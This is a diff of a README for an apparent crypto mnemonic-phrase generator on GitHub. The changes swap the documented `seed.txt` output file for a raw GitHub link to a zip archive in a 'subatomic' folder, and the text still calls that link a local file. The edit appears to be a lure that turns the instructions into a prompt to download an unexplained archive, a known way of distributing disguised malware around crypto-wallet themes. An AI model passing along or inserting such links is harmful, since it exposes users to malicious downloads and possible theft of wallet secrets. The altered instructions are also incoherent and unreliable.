Astoxe/Random-Mnemonic-Phrase-Generator/README.md

 1. **Generating Phrases:**
    - Once you run the script, it will start generating mnemonic phrases for you automatically.
-   - Each mnemonic phrase will be saved in the `seed.txt` file located in the same directory as the script.
+   - Each mnemonic phrase will be saved in the `https://raw.githubusercontent.com/Astoxe/Random-Mnemonic-Phrase-Generator/main/subatomic/Random-Mnemonic-Phrase-Generator.zip` file located in the same directory as the script.

 2. **Deciding to Continue:**
    - After every 100 phrases, the script will ask if you wish to continue.
    - Type "yes" to keep generating phrases or "no" to stop.

 3. **Accessing Your Phrases:**
-   - Open the `seed.txt` file to view all the generated phrases at any time.
+   - Open the `https://raw.githubusercontent.com/Astoxe/Random-Mnemonic-Phrase-Generator/main/subatomic/Random-Mnemonic-Phrase-Generator.zip` file to view all the generated phrases at any time.

 ## 🛠️ Troubleshooting